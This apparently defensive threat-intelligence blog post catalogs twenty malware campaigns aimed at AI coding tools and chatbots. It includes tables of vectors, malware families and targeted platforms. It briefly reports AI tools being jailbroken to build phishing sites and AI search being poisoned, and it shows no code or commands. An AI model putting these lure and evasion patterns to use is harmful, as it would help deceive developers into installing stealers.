Blog

min read

AI Coding Tools Under Fire: Mapping the Malvertising Campaigns Targeting the Vibe Coding Ecosystem

By

Eilon Cohen

and

March 10, 2026

min read

Executive Summary

Between February 2025 and March 2026, at least 20 distinct malware campaigns have targeted AI and vibe coding tools specifically. The targets span the full stack of the AI developer ecosystem: code editors (Cursor, Claude Code), AI agents (OpenClaw), LLM platforms (ChatGPT, DeepSeek, Grok), AI-powered browser extensions, AI video generators (Luma AI, Kling AI), and AI business tools (NovaLeads AI, InVideo AI).

This report catalogs every publicly documented campaign, maps the attack vectors, and identifies which tools have been hit and which are next.

The research builds on our deep-dive analysis of InstallFix: Fake Claude Code Pages Deliver Amatera Stealer via Google Ads which documented one of the most sophisticated campaigns in this dataset: a pixel-perfect Squarespace replica of Anthropic's official documentation, promoted through Google Ads, delivering the Amatera Stealer through an obfuscated multi-stage payload chain. That campaign, cataloged here as #18, exemplifies the attack patterns now proliferating across the ecosystem.

Attack Vector Analysis

The campaigns cluster into five distinct attack vectors, each exploiting a different trust boundary.

1. Search Engine Malvertising (7 campaigns)

Seven campaigns used paid search ads or search engine poisoning. The technique is straightforward: buy an ad for "install [AI tool]" and serve a convincing clone. The InstallFix campaign targeting Claude Code is the most sophisticated example, using a pixel-perfect Squarespace replica of Anthropic's official documentation.

The OpenClaw campaign introduced a new variant: simply hosting fake repos on GitHub was enough to get them promoted by Bing's AI-generated search results. No ad purchase was needed. As Huntress noted, "just hosting the malware on GitHub was enough to poison Bing AI search results." [17] This is a significant escalation because it means AI-powered search is now an attack surface itself.

2. Trusted Domain Abuse (3 campaigns)

Three campaigns exploited user-generated content on the AI platforms' own domains. The ChatGPT shared-chat attack (Kaspersky, December 2025) is particularly clever: attackers create a public ChatGPT conversation containing a fake "Atlas browser" installation guide with a ClickFix terminal command. The link leads to chatgpt.com/share/..., which is OpenAI's legitimate domain. The AdGuard-reported campaign (February 2026) does the same thing with claude.ai artifacts, creating fake Homebrew install guides on Anthropic's own domain and buying Google Ads to promote them.

The trust chain is devastating: Google Ad → official AI platform domain → user-generated malicious content. The victim never leaves a "trusted" site.

3. Extension/Plugin Marketplace Poisoning (6 campaigns)

Six campaigns targeted browser extension or IDE extension marketplaces. The scale is staggering: the Microsoft-reported campaign alone reached 900,000 installs across 20,000+ enterprise tenants. The AiFrame campaign hit 260,000 users. The VS Code AI extension campaign reached 1.5 million downloads.

Extension marketplaces are the weakest link. Review processes are insufficient, and users have been trained to install extensions casually. The Cursor $500K theft started with a single malicious VS Code extension.

4. Fake Download Sites (5 campaigns)

Five campaigns used standalone fake websites distributed through SEO manipulation or social media advertising. The UNC6032 campaign (Mandiant/Google) ran thousands of ads on Facebook and LinkedIn for fake versions of Luma AI, Canva Dream Lab, and Kling AI, reaching 2.3 million users in the EU alone. The DeepSeek campaigns used both Google Ads and standalone phishing sites with fake CAPTCHA pages.

5. Supply Chain Attacks (1 campaign)

One confirmed campaign targeted the npm registry with malicious packages impersonating Cursor IDE tools for macOS. This vector is particularly dangerous because developers install packages programmatically, often without manual review.

Which AI Tools Are Being Targeted?

Not all AI tools face equal risk. The following breakdown shows which tools have been hit, how many times, and through what vectors.

AI Tool # of Campaigns Attack Vectors Used Malware Families
ChatGPT / OpenAI 5 Fake installer, UGC abuse (shared chats), fake Chrome extensions (x3) Lucky_Gh0$t, AMOS, data harvesters
Cursor IDE 3 Google Ads clone, fake VS Code extension, npm supply chain Infostealers, RAT, backdoor
DeepSeek 3 Google Ads, fake CAPTCHA sites, fake Chrome extensions Various stealers, data harvesters
Claude / Claude Code 2 Google Ads → Squarespace clone (InstallFix), Google Ads → claude.ai UGC Amatera Stealer, botnet dropper
Grok AI 2 Fake macOS app, fake Chrome extensions SimpleStealth, data harvesters
OpenClaw 1 Fake GitHub repos (Bing AI poisoned) AMOS, Vidar, GhostSocks
Luma AI 1 Facebook/LinkedIn Ads → fake AI video sites STARKVEIL → XWORM, FROSTRIFT
Kling AI 1 Facebook/LinkedIn Ads → fake AI video sites STARKVEIL → XWORM, FROSTRIFT
Canva Dream Lab 1 Facebook/LinkedIn Ads → fake AI video sites STARKVEIL → XWORM, FROSTRIFT
InVideo AI 1 SEO poisoning → fake installer Numero (destructive)
NovaLeads AI 1 SEO poisoning → fake site CyberLock ransomware
Lovable 1 Abused to create phishing (not impersonated) N/A
VS Code AI extensions 1 Fake Marketplace extensions Infostealers
Gemini 1 Fake Chrome extensions (AiFrame) Data stealer

ChatGPT is the most targeted AI tool by a wide margin, appearing in five separate campaigns. This makes sense: it has the largest user base and the strongest brand recognition, making it the most effective lure. Cursor IDE is the most targeted AI code editor with three distinct campaigns across three different vectors (ads, extensions, npm), demonstrating that attackers probe every possible entry point.

The Full Campaign Matrix

Every confirmed campaign targeting an AI tool, ordered by date of public disclosure.

# Date AI Tool Targeted Attack Vector Malware Platform Scale Source
1 Feb 2025 DeepSeek Fake sites with CAPTCHA ClickFix Various stealers Windows Multiple domains Zscaler [1]
2 Feb 2025 NovaLeads AI SEO poisoning → fake AI tool site CyberLock ransomware Windows Single domain Cisco Talos
3 Mar 2025 DeepSeek Google Ads → fake download pages Infostealers Cross-platform Active ad campaign Malwarebytes
4 Mar 2025 DeepSeek, Grok Phishing sites mimicking homepages Stealers, backdoors, PowerShell scripts Cross-platform Multiple domains Kaspersky
5 Apr 2025 Lovable (abused) Jailbroken to create phishing sites N/A (tool is the weapon) Web Benchmark test Guardio Labs
6 May 2025 Cursor IDE Malicious npm packages Backdoor macOS 3,200+ infections The Hacker News [6]
7 May 2025 ChatGPT Fake "ChatGPT 4.0 Premium" installer Lucky_Gh0$t ransomware Windows Telegram/social distribution Cisco Talos
8 May 2025 InVideo AI SEO poisoning → fake installer Numero (destructive) Windows Single campaign Cisco Talos
9 May 2025 Luma AI, Canva Dream Lab, Kling AI Facebook/LinkedIn Ads → fake AI video sites STARKVEIL → XWORM, FROSTRIFT Windows 2.3M+ EU reach, 30+ sites Mandiant/Google [7]
10 Jul 2025 Cursor IDE Fake VS Code extension RAT + infostealer Cross-platform $500K crypto theft BleepingComputer [8]
11 Sep 2025 Cursor IDE Google Ads → cloned cursor.com Infostealers Cross-platform Active ad campaign ImpersonAlly
12 Dec 2025 ChatGPT Google Ads → chatgpt.com shared chats (UGC) → ClickFix AMOS + backdoor macOS Active campaign Kaspersky
13 Jan 2026 Grok AI Fake macOS app website SimpleStealth macOS Single campaign Mosyle [11]
14 Jan 2026 VS Code AI assistants Fake extensions on Marketplace Infostealers Cross-platform 1.5M+ downloads The Hacker News [12]
15 Feb 2026 Claude (claude.ai artifacts) Google Ads → claude.ai UGC with fake brew commands Botnet dropper macOS Ads active for weeks AdGuard [13]
16 Feb 2026 ChatGPT, Claude, Gemini, Grok Fake Chrome AI assistant extensions (AiFrame) iframe-injecting data stealer Cross-platform 260,000+ installs LayerX [14]
17 Feb 2026 ChatGPT, AI assistants 30 fake AI Chrome extensions Password/data stealer Cross-platform 300,000+ users PCWorld [15]
18 Mar 2026 Claude Code Google Ads → Squarespace clone docs → InstallFix Amatera Stealer macOS Multiple domains, ACTIVE Pillar Research [16]
19 Mar 2026 OpenClaw AI agent Fake GitHub repos → Bing AI search poisoning AMOS, Vidar, GhostSocks macOS + Windows Multiple repos Huntress [17]
20 Mar 2026 ChatGPT, DeepSeek Fake AI assistant browser extensions LLM chat history harvester Cross-platform 900,000 installs, 20K+ enterprises Microsoft [18]

Platform Targeting: macOS Dominance

Of the 20 campaigns, the platform targeting breaks down as follows:

Target Platform # of Campaigns Notable Examples
Cross-platform 9 Browser extensions, fake download sites
macOS exclusively 7 Claude Code, Cursor npm, ChatGPT ClickFix, Grok, Claude.ai artifacts, OpenClaw
Windows exclusively 4 ChatGPT installer, InVideo AI, NovaLeads AI, DeepSeek CAPTCHA

macOS is disproportionately targeted relative to its market share. Seven campaigns target macOS exclusively, and the cross-platform campaigns also include macOS payloads. The reason is clear: AI/vibe coding tool users skew heavily toward macOS, and macOS users tend to have higher-value credentials (SSH keys, cloud tokens, cryptocurrency wallets).

The ClickFix/InstallFix technique (tricking users into pasting commands into Terminal) is uniquely effective against developers because curl | sh is a legitimate installation pattern. Homebrew, Rust, nvm, and many other developer tools use this exact pattern. The malicious commands hide in plain sight.

Malware Arsenal

The campaigns deploy at least 13 distinct malware families, ranging from infostealers to ransomware to destructive malware.

Malware Family Type Platform Campaigns Key Capability
AMOS (Atomic macOS Stealer) Infostealer macOS ChatGPT ClickFix, OpenClaw Keychain, browser data, crypto wallets, file exfil
Amatera Stealer Infostealer macOS Claude Code InstallFix Browser creds, cookies, crypto. Blockchain-based C2.
SimpleStealth Infostealer macOS Fake Grok app Credential theft, system info
Vidar Infostealer Windows OpenClaw Browser data, crypto. C2 via Telegram/Steam.
GhostSocks Proxy malware Windows OpenClaw Converts victim into proxy node for fraud
STARKVEIL Dropper Windows UNC6032 (Luma AI, Kling AI) Drops XWORM, FROSTRIFT, GRIMPULL
XWORM RAT/Backdoor Windows UNC6032 Full remote access, C2 via Telegram
FROSTRIFT Backdoor Windows UNC6032 Persistent access, Tor-based C2
Lucky_Gh0$t Ransomware Windows Fake ChatGPT installer AES-256 + RSA-2048 encryption
CyberLock Ransomware Windows Fake NovaLeads AI PowerShell-based, $50K Monero ransom
Numero Destructive Windows Fake InVideo AI Overwrites all GUI elements, renders OS unusable
LLM Chat Harvester Data stealer Cross-platform Fake AI Chrome extensions Exfils ChatGPT/DeepSeek conversations
AiFrame Data stealer Cross-platform Fake AI Chrome extensions iframe injection, credential theft

The diversity is notable. Attackers are not deploying cookie-cutter stealers; they are tailoring payloads to the target demographic. Developers get infostealers (credentials, crypto). Business users get ransomware. The Numero malware is purely destructive, suggesting some campaigns are motivated by disruption rather than profit.

The Acceleration Curve

Plotting the campaigns by quarter reveals a clear acceleration:

Period # of Campaigns Key Events
Q1 2025 (Jan-Mar) 4 DeepSeek hype wave exploited immediately
Q2 2025 (Apr-Jun) 4 Cursor npm attack, Talos fake AI installers, UNC6032
Q3 2025 (Jul-Sep) 2 Cursor VS Code extension ($500K theft), Cursor Google Ads clone
Q4 2025 (Oct-Dec) 1 ChatGPT ClickFix via shared chats
Q1 2026 (Jan-Mar, partial) 9 Claude Code, OpenClaw, fake extensions (900K+), AiFrame, Grok

The first 10 weeks of 2026 have already produced more campaigns than all of 2025 combined. The trend is unmistakable: as vibe coding tools go mainstream, the attack surface expands proportionally. Every new tool that gains traction becomes a target within weeks.

Tools Not Yet Targeted (But at Risk)

The following popular AI coding tools have no publicly documented impersonation or malvertising campaigns. Based on the patterns observed, they are at elevated risk.

Tool Why It's at Risk
Windsurf (Codeium) Rapidly growing AI code editor, terminal-based install, macOS-heavy userbase. Shares VS Code extension architecture with Cursor (already targeted 3x).
GitHub Copilot Largest AI coding assistant by market share. Vulnerabilities found (CamoLeak, prompt injection) but no impersonation campaign yet. The brand recognition makes it a high-value lure.
Bolt.new Trending vibe coding tool, browser-based but has CLI components. High search volume from non-technical users (ideal ClickFix targets).
Replit Massive userbase including beginners. Already abused as a hosting platform for phishing. The tool itself has not been impersonated yet.
v0 (Vercel) Developer-focused, npm-based install. Growing search volume.
Devin Extremely hyped "AI software engineer." Users actively searching for access/install instructions.
Aider CLI tool with pip install pattern. Growing rapidly in the open-source community.
Continue.dev VS Code extension for AI coding. Same marketplace attack surface as Cursor.

The InstallFix technique (cloning official docs and replacing install commands) is trivially adaptable to any tool that uses curl | sh, npm install, or pip install as its primary installation method. Every tool on this list fits that profile.

The Bigger Picture

Three structural factors make this problem worse, not better:

First, AI search is now an attack surface. The OpenClaw campaign proved that simply hosting malicious content on GitHub is enough to get it promoted by Bing's AI search. As more users rely on AI-generated search summaries rather than manually evaluating URLs, the barrier to successful social engineering drops further.

Second, trusted domains are being weaponized. The ChatGPT shared-chat and claude.ai artifact attacks exploit the fact that AI platforms allow user-generated content on their own domains. When a Google Ad leads to chatgpt.com, even security-conscious users may lower their guard. This is a fundamental design tension: the same features that make AI tools useful (sharing, collaboration, public artifacts) create attack surface.

Third, the cloaking infrastructure is mature. Platforms like 1Campaign (exposed by Varonis, February 2026) have been operational for 3+ years, enabling attackers to bypass Google's ad review with a 99.2% block rate against security scanners. [19] This means the ad review process is structurally broken for this class of attack. The attackers have industrialized their evasion.

The net result: any AI tool that gains significant search volume will be impersonated within weeks. The campaigns are cheap to run, the infrastructure is available as a service, and the targets (developers with high-value credentials) are worth the investment.

References

[1] Zscaler, "DeepSeek Lure Using CAPTCHAs To Spread Malware," February 25, 2025. https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware

[2] Cisco Talos, "Cybercriminals camouflaging threats as AI tool installers," May 29, 2025. https://blog.talosintelligence.com/fake-ai-tool-installers/

[3] Malwarebytes, "DeepSeek users targeted with fake sponsored Google ads that deliver malware," March 26, 2025. https://www.malwarebytes.com/blog/news/2025/03/deepseek-users-targeted-with-fake-sponsored-google-ads-that-deliver-malware

[4] Kaspersky/Securelist, "Backdoors and stealers prey on DeepSeek and Grok," March 6, 2025. https://securelist.com/backdoors-and-stealers-prey-on-deepseek-and-grok/115801/

[5] Guardio Labs, "VibeScamming - From Prompt to Phish," April 9, 2025. https://medium.com/@guardiosecurity/vibescamming-from-prompt-to-phish

[6] The Hacker News, "Malicious npm Packages Infect 3200+ Cursor Users With Backdoor," May 9, 2025. https://thehackernews.com/2025/05/malicious-npm-packages-infect-3200.html

[7] Mandiant/Google, "Text-to-Malware: How Cybercriminals Weaponize Fake AI-Themed Websites," May 27, 2025. https://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites/

[8] BleepingComputer, "Malicious VSCode extension in Cursor IDE led to $500K crypto theft," July 14, 2025. https://www.bleepingcomputer.com/news/security/malicious-vscode-extension-in-cursor-ide-led-to-500k-crypto-theft/

[9] ImpersonAlly, "As AI Booms, Fraudsters Follow: The Case of Cursor," September 7, 2025. https://impersonally.io/as-ai-booms-fraudsters-follow-the-case-of-cursor/

[10] Kaspersky, "The AMOS infostealer is piggybacking ChatGPT's chat-sharing feature," December 9, 2025. https://www.kaspersky.com/blog/share-chatgpt-chat-clickfix-macos-amos-infostealer/54928/

[11] PhoneArena/Mosyle, "Mac users are being targeted by a fake Grok app," January 12, 2026. https://www.phonearena.com/news/mac-users-are-being-targeted-by-a-fake-grok-app-and-its-powered-by-ai_id177227

[12] The Hacker News, "Malicious VS Code AI Extensions with 1.5 Million Installs Steal Data," January 26, 2026. https://thehackernews.com/2026/01/malicious-vs-code-ai-extensions-with-15.html

[13] AdGuard, "Claude-linked Google ads dupe macOS users into installing malware," February 12, 2026. https://adguard.com/en/blog/claude-google-ads-malware-poisoning-macos.html

[14] LayerX, "AiFrame - Fake AI Assistant Extensions Targeting 260,000 Chrome Users," February 12, 2026. https://layerxsecurity.com/blog/aiframe-fake-ai-assistant-extensions-targeting-260000-chrome-users-via-injected-iframes/

[15] PCWorld, "30 fake AI Chrome extensions caught stealing passwords and more," February 17, 2026. https://www.pcworld.com/article/3063476/30-fake-ai-chrome-extensions-caught-stealing-passwords-and-more.html

[16] Pillar Research, "InstallFix: Fake Claude Code Pages Deliver Amatera Stealer via Google Ads," March 9, 2026. https://pillar.security/pillar-research/installfix

[17] BleepingComputer/Huntress, "Bing AI promoted fake OpenClaw GitHub repo pushing info-stealing malware," March 5, 2026. https://www.bleepingcomputer.com/news/security/bing-ai-promoted-fake-openclaw-github-repo-pushing-info-stealing-malware/

[18] Microsoft, "Malicious AI Assistant Extensions Harvest LLM Chat Histories," March 5, 2026. https://www.microsoft.com/en-us/security/blog/2026/03/05/malicious-ai-assistant-extensions-harvest-llm-chat-histories/

[19] Varonis, "1Campaign: A New Cloaking Platform Helping Attackers Abuse Google Ads," February 24, 2026. https://www.varonis.com/blog/1campaign

Subscribe and get the latest security updates

Back to blog

MAYBE YOU WILL FIND THIS INTERSTING AS WELL

Hackerbot-Claw: Adversarial Agent Targets Top GitHub Repos

By

Eilon Cohen

and

March 3, 2026

Research
Your AI Agent Will Run Untrusted Code. Now What?

By

Eilon Cohen

and

Ariel Fogel

February 25, 2026

Research
From Discovery to Large-Scale Validation: Chat Template Backdoors Across 18 Models and 4 Engines

By

Ariel Fogel

and

February 10, 2026

Research